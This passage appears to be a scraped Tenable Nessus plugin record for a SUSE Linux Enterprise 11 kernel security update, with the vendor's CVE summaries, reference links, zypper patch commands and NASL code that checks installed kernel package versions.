(bsc#926240)\n\n - CVE-2015-4700: The bpf_int_jit_compile function in\n arch/x86/net/bpf_jit_comp.c in the Linux kernel before\n 4.0.6 allowed local users to cause a denial of service\n (system crash) by creating a packet filter and then\n loading crafted BPF instructions that trigger late\n convergence by the JIT compiler (bsc#935705).\n\n - CVE-2015-4167: The udf_read_inode function in\n fs/udf/inode.c in the Linux kernel before 3.19.1 did not\n validate certain length values, which allowed local\n users to cause a denial of service (incorrect data\n representation or integer overflow, and OOPS) via a\n crafted UDF filesystem (bsc#933907).\n\n - CVE-2015-0777: drivers/xen/usbback/usbback.c in\n linux-2.6.18-xen-3.4.0 (aka the Xen 3.4.x support\n patches for the Linux kernel 2.6.18), as used in the\n Linux kernel 2.6.x and 3.x in SUSE Linux distributions,\n allows guest OS users to obtain sensitive information\n from uninitialized locations in host OS kernel memory\n via unspecified vectors. 
(bsc#917830)\n\n - CVE-2014-9728: The UDF filesystem implementation in the\n Linux kernel before 3.18.2 did not validate certain\n lengths, which allowed local users to cause a denial of\n service (buffer over-read and system crash) via a\n crafted filesystem image, related to fs/udf/inode.c and\n fs/udf/symlink.c (bsc#933904).\n\n - CVE-2014-9730: The udf_pc_to_char function in\n fs/udf/symlink.c in the Linux kernel before 3.18.2\n relies on component lengths that are unused, which\n allowed local users to cause a denial of service (system\n crash) via a crafted UDF filesystem image (bsc#933904).\n\n - CVE-2014-9729: The udf_read_inode function in\n fs/udf/inode.c in the Linux kernel before 3.18.2 did not\n ensure a certain data-structure size consistency, which\n allowed local users to cause a denial of service (system\n crash) via a crafted UDF filesystem image (bsc#933904).\n\n - CVE-2014-9731: The UDF filesystem implementation in the\n Linux kernel before 3.18.2 did not ensure that space is\n available for storing a symlink target's name along with\n a trailing \\0 character, which allowed local users to\n obtain sensitive information via a crafted filesystem\n image, related to fs/udf/symlink.c and fs/udf/unicode.c\n (bsc#933896).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "published": "2015-10-06T00:00:00", "title": "SUSE SLED11 / SLES11 Security Update : kernel-source (SUSE-SU-2015:1678-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2830", "CVE-2015-1420", "CVE-2015-6252", "CVE-2015-5364", "CVE-2014-9728", "CVE-2014-9730", "CVE-2015-5366", "CVE-2015-0777", "CVE-2014-9729", "CVE-2015-2150", "CVE-2015-4167", "CVE-2014-9731", "CVE-2015-5707", "CVE-2015-4700", "CVE-2015-1805"], "modified": "2015-10-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-xen-extra", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-pae", "p-cpe:/a:novell:suse_linux:kernel-ec2-base", "p-cpe:/a:novell:suse_linux:kernel-default-extra", "p-cpe:/a:novell:suse_linux:kernel-trace-base", "p-cpe:/a:novell:suse_linux:kernel-source", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-trace", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:kernel-trace-devel", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-pae-extra", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-pae-base", "p-cpe:/a:novell:suse_linux:kernel-pae-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-trace-extra", "p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-ec2", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kernel-ec2-devel"], "id": "SUSE_SU-2015-1678-1.NASL", "href": "https://www.tenable.com/plugins/nessus/86290", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:1678-1.\n# The text itself is copyright (C) 
SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86290);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-0777\", \"CVE-2015-1420\", \"CVE-2015-1805\", \"CVE-2015-2150\", \"CVE-2015-2830\", \"CVE-2015-4167\", \"CVE-2015-4700\", \"CVE-2015-5364\", \"CVE-2015-5366\", \"CVE-2015-5707\", \"CVE-2015-6252\");\n script_bugtraq_id(72357, 73014, 73699, 73921, 74951, 74963, 74964, 75001, 75356, 75510);\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : kernel-source (SUSE-SU-2015:1678-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 11 SP4 kernel was updated to receive various\nsecurity and bugfixes.\n\nFollowing security bugs were fixed :\n\n - CVE-2015-6252: Possible file descriptor leak for each\n VHOST_SET_LOG_FD command issued, which could eventually\n waste available system resources and create a denial\n of service (bsc#942367).\n\n - CVE-2015-5707: Possible integer overflow in the\n calculation of total number of pages in\n bio_map_user_iov() (bsc#940338).\n\n - CVE-2015-5364: The (1) udp_recvmsg and (2) udpv6_recvmsg\n functions in the Linux kernel before 4.0.6 do not\n properly consider yielding a processor, which allowed\n remote attackers to cause a denial of service (system\n hang) via incorrect checksums within a UDP packet flood\n (bsc#936831).\n\n - CVE-2015-5366: The (1) udp_recvmsg and (2) udpv6_recvmsg\n functions in the Linux kernel before 4.0.6 provide\n inappropriate -EAGAIN return values, which allowed\n remote attackers to cause a denial of service (EPOLLET\n 
epoll application read outage) via an incorrect checksum\n in a UDP packet, a different vulnerability than\n CVE-2015-5364 (bsc#936831).\n\n - CVE-2015-1420: Race condition in the handle_to_path\n function in fs/fhandle.c in the Linux kernel through\n 3.19.1 allowed local users to bypass intended size\n restrictions and trigger read operations on additional\n memory locations by changing the handle_bytes value of a\n file handle during the execution of this function\n (bsc#915517).\n\n - CVE-2015-1805: The (1) pipe_read and (2) pipe_write\n implementations in fs/pipe.c in the Linux kernel before\n 3.16 do not properly consider the side effects of failed\n __copy_to_user_inatomic and __copy_from_user_inatomic\n calls, which allows local users to cause a denial of\n service (system crash) or possibly gain privileges via a\n crafted application, aka an 'I/O' vector array overrun.\n (bsc#933429)\n\n - CVE-2015-2150: Xen 3.3.x through 4.5.x and the Linux\n kernel through 3.19.1 do not properly restrict access to\n PCI command registers, which might allow local guest\n users to cause a denial of service (non-maskable\n interrupt and host crash) by disabling the (1) memory or\n (2) I/O decoding for a PCI Express device and then\n accessing the device, which triggers an Unsupported\n Request (UR) response. (bsc#919463)\n\n - CVE-2015-2830: arch/x86/kernel/entry_64.S in the Linux\n kernel before 3.19.2 does not prevent the TS_COMPAT flag\n from reaching a user-mode task, which might allow local\n users to bypass the seccomp or audit protection\n mechanism via a crafted application that uses the (1)\n fork or (2) close system call, as demonstrated by an\n attack against seccomp before 3.16. 
(bsc#926240)\n\n - CVE-2015-4700: The bpf_int_jit_compile function in\n arch/x86/net/bpf_jit_comp.c in the Linux kernel before\n 4.0.6 allowed local users to cause a denial of service\n (system crash) by creating a packet filter and then\n loading crafted BPF instructions that trigger late\n convergence by the JIT compiler (bsc#935705).\n\n - CVE-2015-4167: The udf_read_inode function in\n fs/udf/inode.c in the Linux kernel before 3.19.1 did not\n validate certain length values, which allowed local\n users to cause a denial of service (incorrect data\n representation or integer overflow, and OOPS) via a\n crafted UDF filesystem (bsc#933907).\n\n - CVE-2015-0777: drivers/xen/usbback/usbback.c in\n linux-2.6.18-xen-3.4.0 (aka the Xen 3.4.x support\n patches for the Linux kernel 2.6.18), as used in the\n Linux kernel 2.6.x and 3.x in SUSE Linux distributions,\n allows guest OS users to obtain sensitive information\n from uninitialized locations in host OS kernel memory\n via unspecified vectors. 
(bsc#917830)\n\n - CVE-2014-9728: The UDF filesystem implementation in the\n Linux kernel before 3.18.2 did not validate certain\n lengths, which allowed local users to cause a denial of\n service (buffer over-read and system crash) via a\n crafted filesystem image, related to fs/udf/inode.c and\n fs/udf/symlink.c (bsc#933904).\n\n - CVE-2014-9730: The udf_pc_to_char function in\n fs/udf/symlink.c in the Linux kernel before 3.18.2\n relies on component lengths that are unused, which\n allowed local users to cause a denial of service (system\n crash) via a crafted UDF filesystem image (bsc#933904).\n\n - CVE-2014-9729: The udf_read_inode function in\n fs/udf/inode.c in the Linux kernel before 3.18.2 did not\n ensure a certain data-structure size consistency, which\n allowed local users to cause a denial of service (system\n crash) via a crafted UDF filesystem image (bsc#933904).\n\n - CVE-2014-9731: The UDF filesystem implementation in the\n Linux kernel before 3.18.2 did not ensure that space is\n available for storing a symlink target's name along with\n a trailing \\0 character, which allowed local users to\n obtain sensitive information via a crafted filesystem\n image, related to fs/udf/symlink.c and fs/udf/unicode.c\n (bsc#933896).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=777565\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=867362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=873385\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=883380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=884333\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=886785\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=891116\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917830\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917968\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=919463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920016\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920110\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920250\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=920733\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=921430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923002\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=923431\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925881\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=925903\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927355\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929076\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930934\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931620\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932882\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933936\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935055\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935572\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935866\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935906\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=936077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936118\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936637\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936921\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937444\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937503\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937855\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.suse.com/show_bug.cgi?id=939910\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=939994\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940966\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942305\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942350\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942367\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942605\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942938\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=943477\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9728/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9729/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://www.suse.com/security/cve/CVE-2014-9730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9731/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-0777/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1420/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2150/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-2830/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4700/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5366/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5707/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-6252/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151678-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9ebdd7b0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-kernel-20150908-12114=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t 
patch slessp4-kernel-20150908-12114=1\n\nSUSE Linux Enterprise Server 11-EXTRA :\n\nzypper in -t patch slexsp3-kernel-20150908-12114=1\n\nSUSE Linux Enterprise Desktop 11-SP4 :\n\nzypper in -t patch sledsp4-kernel-20150908-12114=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-kernel-20150908-12114=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:kernel-pae-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED11|SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED11 / SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED11\" && (! 
preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-trace-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-extra-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-base-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-devel-3.0.101-65.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-source-3.0.101-65.1\")) flag++;\nif 
